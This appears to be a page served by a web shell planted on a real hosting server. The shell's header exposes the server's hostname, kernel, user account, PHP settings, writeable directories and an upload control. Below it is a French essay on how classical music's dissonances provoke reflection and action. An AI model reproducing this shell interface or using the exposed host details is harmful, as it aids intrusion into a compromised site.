Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/genie/Audio/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/genie/Audio/2017-03-28_Full-Reflechir_agir.txt
La musique telle qu’elle est diffusée permet d’avoir des émotions, mais pas de réfléchir pour agir. Cette approche musicale, visant à se transformer, n’est non seulement pas comprise, mais a été en plus refoulée par l’oligarchie très souvent. Par exemple, il est possible depuis longtemps qu'il y ait un retour des instruments baroques, plus beaux, grâce aux micros dits high-tech.
Si on écoute la musique classique de certains compositeurs, celle-ci peut nous faire réfléchir, puis nous pousser à méditer, des liens se font alors dans notre esprit. Nous gagnons alors en rationalité artistique et en éveil. Nous voulons agir selon cet éveil.
Bach a composé des musiques permettant d’apprendre à ses élèves. Ses compositions sont dans le domaine public, sur les sites www.devenircreatif.com, ou Muse Open. On peut citer par exemple la Toccata et fugue en ré mineur, ou l’Allegro moderato en sol majeur. Sa musique utilise des dissonances, autour de voix. En étant dissociées, elles ressemblent à du jazz bœuf. Le jazz bœuf est un ensemble d’envolées musicales.
Les dissonances sont des notes proches, jouées en même temps, ou l'une à côté de l'autre. Les dissonances sont proches des fausses notes. Elles ne s’oublient pas. Pour Bach et Mozart, ainsi que pour d’autres compositeurs orientés par l’amour de l’humanité, les belles dissonances ont une très grande importance_: Elles engagent la réflexion. En effet, c'est l'inhabituel qui engage notre envie d'évoluer et d'être en mouvement. Les classes mixtes, où les élèves s'apprécient, évoluent très vite. 
Les fausses notes ne s’oublient pas. D’ailleurs certains professeurs de musique vous diront qu’il faut les éviter à tout pris.  Les dissonances sont belles, avec une harmonie amenant l’envie de penser à quelque chose, un rythme suffisant engageant les voix, ou bien un instrument spécifique avec un chœur. Chez Bach, Beethoven, ou Mozart, les dissonances sont en grande partie un point sur une partition, engageant la réflexion. Ne cherchez pas à écouter. Cherchez à vous épanouir. Le religieux positif Vivaldi et Beethoven, le politicien de l'association artistique, ont utilisé cette démarche pour révolutionner les esprits.
Par ailleurs, quand vous entendez certaines notes, vous souhaitez une fin. C’est instinctif. Si vous arrêtez la gamme de do au si, vous attendez une fin. Avec le la, vous vous impatientez. On peut jouer ainsi pour faire tenir l’haleine de l’auditeur. On peut alors comprendre que l’Ave Verum de Mozart, réflexion sur la mort de Jésus, puisse inspirer les films d’action, où un acteur agonise longtemps. L’Ave verum de Mozart met par contre en valeur, par la musique, la notion d’éternité, donc de beauté, en nous faisant réfléchir avec des dissonances, entre les chœurs en plus.
Cette création musicale n’est possible qu’en ayant la foi en la vie, avec un esprit scientifique. Leibniz indique que la vie et l'esprit sont très dépréciés des scientifiques de son époque ou actuels. Ce genre de création musicale sur les limites de l'humain amène la réflexion chez les autres. L’esprit scientifique en question, c’est la réflexion platonique, visant à vérifier des hypothèses par expériences, pour créer une hypothèse supérieure aux autres. C’est ce que peut créer l’Ave Verum de Mozart, si l’on souhaite réfléchir, ce que veut Mozart.
Comment est-il possible d’engager une réflexion_?
Les voix sont les reflets d’une situation, souvent dans la nature ou l’humain, nous faisant penser_:
- À une progression, car la complexité de la partition s’intensifie ou évolue.
- À un ensemble d’interactions entre les voix, portant à la réflexion.
- À une plénitude en cours d’acquisition, si les voix deviennent graves ou s’allongent.
La création et l’enseignement sont sur, ou sont les limites de l’humain. Si on s’intéresse à comprendre comment les compositeurs créent une partition, le mieux pour les comprendre est de faire comme eux, en adaptant ce qu'on écoute à son esprit. On apprend d’abord à comprendre comment sont construites les partitions nous faisant évoluer, pour ensuite montrer comment on ressent les éléments, afin de faire réfléchir sur nos limites, puis celles de notre société.
L’écriture est centrale dans toute activité de création, car elle permet de comprendre où l’on veut aller. La poésie est nécessaire, avant tout début de création, car elle permet de comprendre ses sens, afin d’élever son esprit vers le beau, vers l’éternité, vers la transmission.
Quelqu’un, qui ne fait que profiter du beau d'une musique et de l’éternité d’une réflexion humaine, sans essayer de la créer, finit par s'ennuyer. En effet il ne peut que s’adapter à cette beauté, sans agir pour créer sa propre vision, d’une situation humaine. Il ne comprendra plus pourquoi il a aimé cette écoute. Il voudra alors retourner vers la société de consommation, pour profiter et donc subir, sans vouloir agir sur les autres.

Sources
Exemple de perception des éléments avec les ’jeux de plage’ - Ehma - Art Libre - www.musique-libre.org
Schumann et Ave Verum de Mozart
http://fr.wikibooks.org
https://fr.wikipedia.org - musique
http://classic-intro.net

Mes notes

Trouvez de la musique qui fait réfléchir pour agir.
En se remettant en cause, avec l'écoute de musiques, distinguez une musique ne rendant qu'émotif d'une musique, amenant la réflexion constructive. Ces musiques amènent des rêves constructifs, quand on est calme.

SAMX